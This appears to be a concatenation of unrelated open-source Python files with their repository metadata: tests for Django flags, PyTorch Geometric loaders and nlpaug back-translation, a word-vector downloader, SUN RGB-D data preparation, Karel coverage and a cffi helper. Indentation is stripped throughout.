self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# End-to-end test
#
@vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")
def test_management_command(self):
sample = Sample()
sample.accession_code = "DRR001173"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
command = Command()
SOURCE_NAME = "refinebio_tests"
command.handle(file=TEST_METADATA, source_name=SOURCE_NAME, methods_url="ccdatalab.org")
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = sample.contributed_metadata
self.assertEqual(
set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()),
{"value", "confidence"},
)
self.assertEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name,
"female",
)
self.assertAlmostEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"], 0.7856624891880539
)
|
flags/tests/test_management_commands_enable_flag.py
|
mdunc/django-flags
| 142 |
63660
|
from io import StringIO
from django.core.management import call_command
from django.core.management.base import CommandError
from django.test import TestCase
from flags.state import flag_enabled
class EnableFlagTestCase(TestCase):
def test_enable_flag(self):
out = StringIO()
self.assertFalse(flag_enabled("DB_FLAG"))
call_command("enable_flag", "DB_FLAG", stdout=out)
self.assertTrue(flag_enabled("DB_FLAG"))
self.assertIn("Successfully enabled", out.getvalue())
def test_enable_flag_non_existent_flag(self):
with self.assertRaises(CommandError):
call_command("enable_flag", "FLAG_DOES_NOT_EXIST")
|
test/loader/test_link_neighbor_loader.py
|
NucciTheBoss/pytorch_geometric
| 2,350 |
63665
|
<filename>test/loader/test_link_neighbor_loader.py
import pytest
import torch
from torch_geometric.data import Data, HeteroData
from torch_geometric.loader import LinkNeighborLoader
def get_edge_index(num_src_nodes, num_dst_nodes, num_edges):
row = torch.randint(num_src_nodes, (num_edges, ), dtype=torch.long)
col = torch.randint(num_dst_nodes, (num_edges, ), dtype=torch.long)
return torch.stack([row, col], dim=0)
def unique_edge_pairs(edge_index):
return set(map(tuple, edge_index.t().tolist()))
@pytest.mark.parametrize('directed', [True, False])
@pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0])
def test_homogeneous_link_neighbor_loader(directed, neg_sampling_ratio):
torch.manual_seed(12345)
pos_edge_index = get_edge_index(100, 50, 500)
neg_edge_index = get_edge_index(100, 50, 500)
neg_edge_index[1, :] += 50
edge_label_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1)
edge_label = torch.cat([torch.ones(500), torch.zeros(500)], dim=0)
data = Data()
data.edge_index = pos_edge_index
data.x = torch.arange(100)
data.edge_attr = torch.arange(500)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=20,
edge_label_index=edge_label_index,
edge_label=edge_label if neg_sampling_ratio == 0.0 else None,
directed=directed,
neg_sampling_ratio=neg_sampling_ratio,
shuffle=True,
)
assert str(loader) == 'LinkNeighborLoader()'
assert len(loader) == 1000 / 20
for batch in loader:
assert isinstance(batch, Data)
assert len(batch) == 5
assert batch.x.size(0) <= 100
assert batch.x.min() >= 0 and batch.x.max() < 100
assert batch.edge_index.min() >= 0
assert batch.edge_index.max() < batch.num_nodes
assert batch.edge_attr.min() >= 0
assert batch.edge_attr.max() < 500
if neg_sampling_ratio == 0.0:
assert batch.edge_label_index.size(1) == 20
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch.edge_index)
edge_label_index = batch.edge_label_index[:, batch.edge_label == 1]
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
# Assert negative samples are not present in the original graph:
edge_index = unique_edge_pairs(batch.edge_index)
edge_label_index = batch.edge_label_index[:, batch.edge_label == 0]
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index & edge_label_index) == 0
else:
assert batch.edge_label_index.size(1) == 40
assert torch.all(batch.edge_label[:20] == 1)
assert torch.all(batch.edge_label[20:] == 0)
@pytest.mark.parametrize('directed', [True, False])
@pytest.mark.parametrize('neg_sampling_ratio', [0.0, 1.0])
def test_heterogeneous_link_neighbor_loader(directed, neg_sampling_ratio):
torch.manual_seed(12345)
data = HeteroData()
data['paper'].x = torch.arange(100)
data['author'].x = torch.arange(100, 300)
data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500)
data['paper', 'paper'].edge_attr = torch.arange(500)
data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000)
data['paper', 'author'].edge_attr = torch.arange(500, 1500)
data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000)
data['author', 'paper'].edge_attr = torch.arange(1500, 2500)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
edge_label_index=('paper', 'author'),
batch_size=20,
directed=directed,
neg_sampling_ratio=neg_sampling_ratio,
shuffle=True,
)
assert str(loader) == 'LinkNeighborLoader()'
assert len(loader) == 1000 / 20
for batch in loader:
assert isinstance(batch, HeteroData)
if neg_sampling_ratio == 0.0:
assert len(batch) == 4
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch['paper', 'author'].edge_index)
edge_label_index = batch['paper', 'author'].edge_label_index
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
else:
assert len(batch) == 5
assert batch['paper', 'author'].edge_label_index.size(1) == 40
assert torch.all(batch['paper', 'author'].edge_label[:20] == 1)
assert torch.all(batch['paper', 'author'].edge_label[20:] == 0)
@pytest.mark.parametrize('directed', [True, False])
def test_heterogeneous_link_neighbor_loader_loop(directed):
torch.manual_seed(12345)
data = HeteroData()
data['paper'].x = torch.arange(100)
data['author'].x = torch.arange(100, 300)
data['paper', 'paper'].edge_index = get_edge_index(100, 100, 500)
data['paper', 'author'].edge_index = get_edge_index(100, 200, 1000)
data['author', 'paper'].edge_index = get_edge_index(200, 100, 1000)
loader = LinkNeighborLoader(data, num_neighbors=[-1] * 2,
edge_label_index=('paper', 'paper'),
batch_size=20, directed=directed)
for batch in loader:
assert batch['paper'].x.size(0) <= 100
assert batch['paper'].x.min() >= 0 and batch['paper'].x.max() < 100
# Assert positive samples are present in the original graph:
edge_index = unique_edge_pairs(batch['paper', 'paper'].edge_index)
edge_label_index = batch['paper', 'paper'].edge_label_index
edge_label_index = unique_edge_pairs(edge_label_index)
assert len(edge_index | edge_label_index) == len(edge_index)
def test_link_neighbor_loader_edge_label():
torch.manual_seed(12345)
edge_index = get_edge_index(100, 100, 500)
data = Data(edge_index=edge_index, x=torch.arange(100))
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=10,
neg_sampling_ratio=1.0,
)
for batch in loader:
assert batch.edge_label.dtype == torch.float
assert torch.all(batch.edge_label[:10] == 1.0)
assert torch.all(batch.edge_label[10:] == 0.0)
loader = LinkNeighborLoader(
data,
num_neighbors=[-1] * 2,
batch_size=10,
edge_label=torch.ones(500, dtype=torch.long),
neg_sampling_ratio=1.0,
)
for batch in loader:
assert batch.edge_label.dtype == torch.long
assert torch.all(batch.edge_label[:10] == 2)
assert torch.all(batch.edge_label[10:] == 0)
|
chakin/downloader.py
|
massongit/chakin
| 334 |
63675
|
# -*- coding: utf-8 -*-
import os
import pandas as pd
from progressbar import Bar, ETA, FileTransferSpeed, ProgressBar, Percentage, RotatingMarker
from six.moves.urllib.request import urlretrieve
def load_datasets(path=os.path.join(os.path.dirname(__file__), 'datasets.csv')):
datasets = pd.read_csv(path)
return datasets
def download(number=-1, name="", save_dir='./'):
"""Download pre-trained word vector
:param number: integer, default ``None``
:param save_dir: str, default './'
:return: file path for downloaded file
"""
df = load_datasets()
if number > -1:
row = df.iloc[[number]]
elif name:
row = df.loc[df["Name"] == name]
url = ''.join(row.URL)
if not url:
print('The word vector you specified was not found. Please specify correct name.')
widgets = ['Test: ', Percentage(), ' ', Bar(marker=RotatingMarker()), ' ', ETA(), ' ', FileTransferSpeed()]
pbar = ProgressBar(widgets=widgets)
def dlProgress(count, blockSize, totalSize):
if pbar.max_value is None:
pbar.max_value = totalSize
pbar.start()
pbar.update(min(count * blockSize, totalSize))
file_name = url.split('/')[-1]
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = os.path.join(save_dir, file_name)
path, _ = urlretrieve(url, save_path, reporthook=dlProgress)
pbar.finish()
return path
def search(lang=''):
"""Search pre-trained word vectors by their language
:param lang: str, default ''
:return: None
print search result as pandas DataFrame
"""
df = load_datasets()
if lang == '':
print(df[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']])
else:
rows = df[df.Language==lang]
print(rows[['Name', 'Dimension', 'Corpus', 'VocabularySize', 'Method', 'Language', 'Author']])
|
script/build_day_stat.py
|
khamdamoff/daysandbox_bot
| 101 |
63689
|
<gh_stars>100-1000
from collections import Counter
from datetime import datetime, timedelta
from database import connect_db
def setup_arg_parser(parser):
parser.add_argument('days_ago', type=int, default=0)
def get_chat_id(event):
return event.get('chat_id', event['chat']['id'])
def main(days_ago, **kwargs):
db = connect_db()
day = datetime.utcnow().replace(
hour=0, minute=0, second=0, microsecond=0
)
for x in range(days_ago + 1):
start = day - timedelta(days=x)
end = start + timedelta(days=1)
query = {
'type': 'delete_msg',
'date': {
'$gte': start,
'$lt': end,
},
}
del_count = 0
chat_reg = set()
for event in db.event.find(query):
del_count += 1
chat_reg.add(get_chat_id(event))
db.day_stat.find_one_and_update(
{'date': start},
{'$set': {
'delete_msg': del_count,
'chat': len(chat_reg),
}},
upsert=True,
)
print('Date: %s' % start)
print(' * delete_msg: %d' % del_count)
print(' * chat: %d' % len(chat_reg))
|
asreview/query_strategies.py
|
DominiqueMaciejewski/asreview
| 280 |
63702
|
# Copyright 2019-2020 The ASReview Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asreview.models.deprecated import _moved_warning
from asreview.models.query.max import MaxQuery as _MaxQuery
from asreview.models.query.mixed import MixedQuery as _MixedQuery
from asreview.models.query.uncertainty import UncertaintyQuery as _UncertaintyQuery
from asreview.models.query.random import RandomQuery as _RandomQuery
from asreview.models.query.cluster import ClusterQuery as _ClusterQuery
from asreview.models.query.utils import get_query_model as _get_query_model
from asreview.models.query.utils import get_query_class as _get_query_class
from asreview.models.query.utils import list_query_strategies as _list_query_strategies
"""Deprecated, will be removed in version 1.0"""
MaxQuery = _moved_warning(
_MaxQuery, "asreview.models.query.MaxQuery",
"asreview.query_strategies.MaxQuery")
MixedQuery = _moved_warning(
_MixedQuery, "asreview.models.query.MixedQuery",
"asreview.query_strategies.MixedQuery")
UncertaintyQuery = _moved_warning(
_UncertaintyQuery, "asreview.models.query.UncertaintyQuery",
"asreview.query_strategies.UncertaintyQuery")
RandomQuery = _moved_warning(
_RandomQuery, "asreview.models.query.RandomQuery",
"asreview.query_strategies.RandomQuery")
ClusterQuery = _moved_warning(
_ClusterQuery, "asreview.models.query.ClusterQuery",
"asreview.query_strategies.ClusterQuery")
get_query_model = _moved_warning(
_get_query_model, "asreview.models.query.get_query_model",
"asreview.query_strategies.get_query_model")
get_query_class = _moved_warning(
_get_query_class, "asreview.models.query.get_query_class",
"asreview.query_strategies.get_query_class")
list_query_strategies = _moved_warning(
_list_query_strategies, "asreview.models.query.list_query_strategies",
"asreview.query_strategies.list_query_strategies")
|
sunrgbd/prepare_data.py
|
lemontyc/frustum-convnet
| 247 |
63710
|
''' Helper class and functions for loading SUN RGB-D objects
Author: <NAME>
Date: October 2017
Modified by <NAME>
'''
import os
import sys
import numpy as np
import pickle
import argparse
from PIL import Image
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
import sunrgbd_utils as utils
from sunrgbd_object import sunrgbd_object
from sunrgbd_utils import random_shift_box2d, extract_pc_in_box3d
def ravel_hash(coord):
assert coord.ndim == 2
coord -= coord.min(0)
coord_max = coord.max(0) + 1
keys = np.zeros(coord.shape[0], dtype=np.int64)
for i in range(coord.shape[1] - 1):
keys += coord[:, i]
keys *= coord_max[i + 1]
keys += coord[:, -1]
return keys
def down_sample(x, voxel_size=(0.05, )):
if isinstance(voxel_size, float):
voxel_size = (voxel_size, )
if len(voxel_size) == 1:
voxel_size = voxel_size * 3
voxel_size = np.array(voxel_size, dtype=np.float32)
voxel_index = np.floor(x / voxel_size).astype(np.int64, copy=False)
hash_keys = ravel_hash(voxel_index)
_, idx = np.unique(hash_keys, return_index=True)
return idx
def get_box3d_dim_statistics(my_sunrgbd_dir, idx_filename, type_whitelist):
dataset = sunrgbd_object(my_sunrgbd_dir)
dimension_list = []
type_list = []
data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]
for data_idx in data_idx_list:
print('------------- ', data_idx)
objects = dataset.get_label_objects(data_idx)
for obj_idx in range(len(objects)):
obj = objects[obj_idx]
if obj.classname not in type_whitelist:
continue
dimension_list.append(np.array([obj.l, obj.w, obj.h]))
type_list.append(obj.classname)
print("number of objects: {} ".format(len(type_list)))
print("categories:", list(sorted(type_whitelist)))
# Get average box size for different categories
for class_type in sorted(set(type_list)):
cnt = 0
box3d_list = []
for i in range(len(dimension_list)):
if type_list[i] == class_type:
cnt += 1
box3d_list.append(dimension_list[i])
median_box3d = np.median(box3d_list, 0)
print("\'%s\': np.array([%f,%f,%f])," %
(class_type, median_box3d[0] * 2, median_box3d[1] * 2, median_box3d[2] * 2))
def read_det_file(det_file):
id_list = []
type_list = []
prob_list = []
box2d_list = []
# data_idx, type_list, prob, box2d
with open(det_file, 'rt') as f:
for line in f:
t = line.rstrip().split(" ")
id_list.append(int(t[0]))
type_list.append(t[1])
prob_list.append(float(t[2]))
box2d_list.append(np.array([float(t[i]) for i in range(3, 7)]))
return id_list, type_list, box2d_list, prob_list
def read_det_pkl_file(det_file):
classes = [
'__background__', 'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser',
'garbage_bin', 'lamp', 'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet'
]
with open(det_file, 'rb') as f:
dets = pickle.load(f)
num_classes = len(dets)
num_images = len(dets[0])
id_list = []
type_list = []
prob_list = []
box2d_list = []
for i in range(num_images):
for c in range(1, num_classes):
det = dets[c][i]
for j in range(len(det)):
id_list.append((i + 1))
type_list.append(classes[c])
prob_list.append(det[j][4])
box2d_list.append(det[j][:4])
return id_list, type_list, box2d_list, prob_list
def extract_frustum_data(sunrgbd_dir,
idx_filename,
split,
output_filename,
type_whitelist,
perturb_box2d=False,
augmentX=1,
with_down_sample=False):
dataset = sunrgbd_object(sunrgbd_dir, split)
data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]
id_list = [] # int number
box2d_list = [] # [xmin,ymin,xmax,ymax]
box3d_list = [] # (8,3) array in upright depth coord
input_list = [] # channel number = 6, xyz,rgb in upright depth coord
label_list = [] # 1 for roi object, 0 for clutter
type_list = [] # string e.g. bed
heading_list = [] # face of object angle, radius of clockwise angle from positive x axis in upright camera coord
box3d_size_list = [] # array of l,w,h
frustum_angle_list = [] # angle of 2d box center from pos x-axis (clockwise)
img_coord_list = []
calib_K_list = []
calib_R_list = []
pos_cnt = 0
all_cnt = 0
for data_idx in data_idx_list:
print('------------- ', data_idx)
calib = dataset.get_calibration(data_idx)
objects = dataset.get_label_objects(data_idx)
pc_upright_depth = dataset.get_pointcloud(data_idx)
pc_upright_camera = np.zeros_like(pc_upright_depth)
pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3])
pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
if with_down_sample:
idx = down_sample(pc_upright_camera[:, :3], 0.01)
# print(len(idx), len(pc_upright_camera))
pc_upright_camera = pc_upright_camera[idx]
pc_upright_depth = pc_upright_depth[idx]
# img = dataset.get_image(data_idx)
# img_height, img_width, img_channel = img.shape
pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth)
for obj_idx in range(len(objects)):
obj = objects[obj_idx]
if obj.classname not in type_whitelist:
continue
# 2D BOX: Get pts rect backprojected
box2d = obj.box2d
for _ in range(augmentX):
if perturb_box2d:
xmin, ymin, xmax, ymax = random_shift_box2d(box2d)
# print(xmin,ymin,xmax,ymax)
else:
xmin, ymin, xmax, ymax = box2d
box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & (
pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin)
coord_in_box_fov = pc_image_coord[box_fov_inds, :]
pc_in_box_fov = pc_upright_camera[box_fov_inds, :]
# Get frustum angle (according to center pixel in 2D BOX)
box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0])
uvdepth = np.zeros((1, 3))
uvdepth[0, 0:2] = box2d_center
uvdepth[0, 2] = 20 # some random depth
box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth)
# print('UVdepth, center in upright camera: ', uvdepth, box2d_center_upright_camera)
frustum_angle = -1 * np.arctan2(
box2d_center_upright_camera[0, 2],
box2d_center_upright_camera[0, 0]) # angle as to positive x-axis as in the Zoox paper
# print('Frustum angle: ', frustum_angle)
# 3D BOX: Get pts velo in 3d box
box3d_pts_2d, box3d_pts_3d = utils.compute_box_3d(obj, calib)
box3d_pts_3d = calib.project_upright_depth_to_upright_camera(box3d_pts_3d)
try:
_, inds = extract_pc_in_box3d(pc_in_box_fov, box3d_pts_3d)
except Exception as e:
print(e)
continue
label = np.zeros((pc_in_box_fov.shape[0]))
label[inds] = 1
box3d_size = np.array([2 * obj.l, 2 * obj.w, 2 * obj.h])
# Subsample points..
num_point = pc_in_box_fov.shape[0]
if num_point > 2048:
choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False)
coord_in_box_fov = coord_in_box_fov[choice, :]
pc_in_box_fov = pc_in_box_fov[choice, :]
label = label[choice]
# Reject object with too few points
if np.sum(label) < 5:
continue
id_list.append(data_idx)
box2d_list.append(np.array([xmin, ymin, xmax, ymax], dtype=np.float32))
box3d_list.append(box3d_pts_3d)
input_list.append(pc_in_box_fov.astype(np.float32))
label_list.append(label.astype(np.bool))
type_list.append(obj.classname)
heading_list.append(obj.heading_angle)
box3d_size_list.append(box3d_size)
frustum_angle_list.append(frustum_angle)
img_coord_list.append(coord_in_box_fov.astype(np.float32))
calib_K_list.append(calib.K)
calib_R_list.append(calib.Rtilt)
# collect statistics
pos_cnt += np.sum(label)
all_cnt += pc_in_box_fov.shape[0]
print('Average pos ratio: ', pos_cnt / float(all_cnt))
print('Average npoints: ', float(all_cnt) / len(id_list))
data_dict = {
'id': id_list,
'box2d': box2d_list,
'box3d': box3d_list,
'box3d_size': box3d_size_list,
'box3d_heading': heading_list,
'type': type_list,
'input': input_list,
'frustum_angle': frustum_angle_list,
'label': label_list,
'calib_K': calib_K_list,
'calib_R': calib_R_list,
# 'image_coord': img_coord_list,
}
with open(output_filename, 'wb') as f:
pickle.dump(data_dict, f, -1)
print("save in {}".format(output_filename))
def extract_frustum_data_from_rgb_detection(sunrgbd_dir,
det_file,
split,
output_filename,
type_whitelist,
valid_id_list=None,
with_down_sample=False):
dataset = sunrgbd_object(sunrgbd_dir, split)
if det_file.split('.')[-1] == 'txt':
det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_file(det_file)
else:
det_id_list, det_type_list, det_box2d_list, det_prob_list = read_det_pkl_file(det_file)
cache_id = -1
cache = None
id_list = []
type_list = []
box2d_list = []
prob_list = []
input_list = [] # channel number = 4, xyz,intensity in rect camera coord
frustum_angle_list = [] # angle of 2d box center from pos x-axis
img_coord_list = []
calib_K_list = []
calib_R_list = []
for det_idx in range(len(det_id_list)):
data_idx = det_id_list[det_idx]
if valid_id_list is not None and data_idx not in valid_id_list:
continue
if det_type_list[det_idx] not in type_whitelist:
continue
print('det idx: %d/%d, data idx: %d' % (det_idx, len(det_id_list), data_idx))
if cache_id != data_idx:
calib = dataset.get_calibration(data_idx)
pc_upright_depth = dataset.get_pointcloud(data_idx)
pc_upright_camera = np.zeros_like(pc_upright_depth)
pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(pc_upright_depth[:, 0:3])
pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
if with_down_sample:
idx = down_sample(pc_upright_camera[:, :3], 0.01)
# print(len(idx), len(pc_upright_camera))
pc_upright_camera = pc_upright_camera[idx]
pc_upright_depth = pc_upright_depth[idx]
# img = dataset.get_image(data_idx)
# img_height, img_width, img_channel = img.shape
pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth)
cache = [calib, pc_upright_camera, pc_image_coord]
cache_id = data_idx
else:
calib, pc_upright_camera, pc_image_coord = cache
# 2D BOX: Get pts rect backprojected
xmin, ymin, xmax, ymax = det_box2d_list[det_idx]
box_fov_inds = (pc_image_coord[:, 0] < xmax) & (pc_image_coord[:, 0] >= xmin) & (
pc_image_coord[:, 1] < ymax) & (pc_image_coord[:, 1] >= ymin)
coord_in_box_fov = pc_image_coord[box_fov_inds, :]
pc_in_box_fov = pc_upright_camera[box_fov_inds, :]
# Get frustum angle (according to center pixel in 2D BOX)
box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0])
uvdepth = np.zeros((1, 3))
uvdepth[0, 0:2] = box2d_center
uvdepth[0, 2] = 20 # some random depth
box2d_center_upright_camera = calib.project_image_to_upright_camera(uvdepth)
frustum_angle = -1 * np.arctan2(
box2d_center_upright_camera[0, 2],
box2d_center_upright_camera[0, 0]) # angle as to positive x-axis as in the Zoox paper
# Subsample points..
num_point = pc_in_box_fov.shape[0]
if num_point > 2048:
choice = np.random.choice(pc_in_box_fov.shape[0], 2048, replace=False)
coord_in_box_fov = coord_in_box_fov[choice, :]
pc_in_box_fov = pc_in_box_fov[choice, :]
# Pass objects that are too small
if len(pc_in_box_fov) < 5:
continue
id_list.append(data_idx)
type_list.append(det_type_list[det_idx])
box2d_list.append(det_box2d_list[det_idx])
prob_list.append(det_prob_list[det_idx])
input_list.append(pc_in_box_fov.astype(np.float32))
frustum_angle_list.append(frustum_angle)
img_coord_list.append(coord_in_box_fov.astype(np.float32))
calib_K_list.append(calib.K)
calib_R_list.append(calib.Rtilt)
data_dict = {
'id': id_list,
'type': type_list,
'box2d': box2d_list,
'box2d_prob': prob_list,
'input': input_list,
'frustum_angle': frustum_angle_list,
'calib_K': calib_K_list,
'calib_R': calib_R_list,
# 'image_coord': img_coord_list,
}
with open(output_filename, 'wb') as f:
pickle.dump(data_dict, f, -1)
print("save in {}".format(output_filename))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gen_train',
action='store_true',
help='Generate train split frustum data with perturbed GT 2D boxes')
parser.add_argument('--gen_val', action='store_true', help='Generate val split frustum data with GT 2D boxes')
parser.add_argument('--gen_val_rgb_detection',
action='store_true',
help='Generate val split frustum data with RGB detection 2D boxes')
parser.add_argument('--num_classes', default=10, type=int, help='19 or 10 categories, default 10')
parser.add_argument('--save_dir',
default='sunrgbd/data/pickle_data',
type=str,
help='directory to save data, default[sunrgbd/data/pickle_data]')
parser.add_argument('--gen_avg_dim', action='store_true', help='get average dimension of each class')
args = parser.parse_args()
my_sunrgbd_dir = 'sunrgbd/mysunrgbd' # change if you do not set default path
if args.num_classes == 10:
type_whitelist = [
'bed', 'table', 'sofa', 'chair', 'toilet', 'desk', 'dresser', 'night_stand', 'bookshelf', 'bathtub'
]
elif args.num_classes == 19:
type_whitelist = [
'bathtub', 'bed', 'bookshelf', 'box', 'chair', 'counter', 'desk', 'door', 'dresser', 'garbage_bin', 'lamp',
'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table', 'tv', 'toilet'
]
else:
assert False, 'please set correct num_classes'
type_whitelist = set(type_whitelist)
if args.gen_avg_dim:
get_box3d_dim_statistics(my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt', type_whitelist)
save_dir = args.save_dir
if not os.path.exists(save_dir):
os.makedirs(save_dir)
if args.gen_train:
extract_frustum_data(my_sunrgbd_dir,
'sunrgbd/image_sets/train.txt',
'training',
output_filename=os.path.join(save_dir, 'sunrgbd_train_aug5x.pickle'),
type_whitelist=type_whitelist,
perturb_box2d=True,
augmentX=5,
with_down_sample=False)
if args.gen_val:
extract_frustum_data(my_sunrgbd_dir,
'sunrgbd/image_sets/val.txt',
'training',
output_filename=os.path.join(save_dir, 'sunrgbd_val.pickle'),
type_whitelist=type_whitelist,
perturb_box2d=False,
augmentX=1,
with_down_sample=False)
if args.gen_val_rgb_detection:
extract_frustum_data_from_rgb_detection(my_sunrgbd_dir,
'./sunrgbd/rgb_detections/sunrgbd_rgb_det_val_classes19_mAP50.2.txt',
'training',
os.path.join(save_dir,'sunrgbd_rgb_det_val.pickle'),
type_whitelist=type_whitelist)
|
program_synthesis/karel/dataset/coverage.py
|
kavigupta/program_synthesis
| 123 |
63720
|
from program_synthesis.karel.dataset import executor
from program_synthesis.karel.dataset import parser_for_synthesis
branch_types = {'if', 'ifElse', 'while'}
stmt_types = {'move', 'turnLeft', 'turnRight', 'putMarker', 'pickMarker'}
class CoverageMeasurer(object):
def __init__(self, code):
self.parser = parser_for_synthesis.KarelForSynthesisParser(
build_tree=True)
self.executor = executor.KarelExecutor()
self.code = code
tree = self.parser.parse(code)
# Statement coverage: actions
self.stmt_coverage = {span: 0 for span in self.parser.action_spans}
# Branch coverage: if, ifelse, while
self.branch_coverage = {(span, cond_value): 0
for span in self.parser.cond_block_spans
for cond_value in (True, False)}
def add(self, inp):
out, trace = self.executor.execute(
self.code, None, inp, record_trace=True)
if not out:
return False
for event in trace.events:
if event.type in branch_types:
self.branch_coverage[event.span, event.cond_value] += 1
elif event.type in stmt_types:
self.stmt_coverage[event.span] += 1
return True
def uncovered(self):
return (tuple(k for k, v in self.stmt_coverage.iteritems() if v == 0),
tuple(k for k, v in self.branch_coverage.iteritems() if v == 0))
|
test/augmenter/word/test_back_translation.py
|
techthiyanes/nlpaug
| 3,121 |
63741
|
<gh_stars>1000+
import unittest
import os
import torch
from dotenv import load_dotenv
import nlpaug.augmenter.word as naw
import nlpaug.model.lang_models as nml
class TestBackTranslationAug(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '.env'))
load_dotenv(env_config_path)
cls.text = 'The quick brown fox jumps over the lazy dog'
cls.texts = [
'The quick brown fox jumps over the lazy dog',
"Seeing all of the negative reviews for this movie, I figured that it could be yet another comic masterpiece that wasn't quite meant to be."
]
cls.eng_model_names = [{
'from_model_name': 'facebook/wmt19-en-de',
'to_model_name': 'facebook/wmt19-de-en',
}
]
def sample_test_case(self, device):
# From English
for model_name in self.eng_model_names:
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], device=device)
augmented_text = aug.augment(self.text)
aug.clear_cache()
self.assertNotEqual(self.text, augmented_text)
augmented_texts = aug.augment(self.texts)
aug.clear_cache()
for d, a in zip(self.texts, augmented_texts):
self.assertNotEqual(d, a)
if device == 'cpu':
self.assertTrue(device == aug.model.get_device())
elif 'cuda' in device:
self.assertTrue('cuda' in aug.model.get_device())
def test_back_translation(self):
if torch.cuda.is_available():
self.sample_test_case('cuda')
self.sample_test_case('cpu')
def test_batch_size(self):
model_name = self.eng_model_names[0]
# 1 per batch
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=1)
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# batch size = input size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=len(self.texts))
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# batch size > input size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=len(self.texts)+1)
aug_data = aug.augment(self.texts)
self.assertEqual(len(aug_data), len(self.texts))
# input size > batch size
aug = naw.BackTranslationAug(from_model_name=model_name['from_model_name'],
to_model_name=model_name['to_model_name'], batch_size=2)
aug_data = aug.augment(self.texts * 2)
self.assertEqual(len(aug_data), len(self.texts)*2)
|
snaek/ffi.py
|
mitsuhiko/snaek
| 272 |
63742
|
import os
import re
import sys
import cffi
from ._compat import PY2
_directive_re = re.compile(r'^\s*#.*?$(?m)')
def make_ffi(module_path, crate_path, cached_header_filename=None):
"""Creates a FFI instance for the given configuration."""
if cached_header_filename is not None and \
os.path.isfile(cached_header_filename):
with open(cached_header_filename, 'rb') as f:
header = f.read()
if not PY2:
header = header.decode('utf-8')
else:
from .bindgen import generate_header
header = generate_header(crate_path)
header = _directive_re.sub('', header)
if os.environ.get('SNAEK_DEBUG_HEADER') == '1':
sys.stderr.write('/* generated header for "%s" */\n' % module_path)
sys.stderr.write(header)
sys.stderr.write('\n')
sys.stderr.flush()
ffi = cffi.FFI()
ffi.cdef(header)
ffi.set_source(module_path, None)
return ffi
|
google-api-client-generator/src/googleapis/codegen/cpp_import_manager_test.py
|
cclauss/discovery-artifact-manager
| 178 |
63751
|
#!/usr/bin/python2.7
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
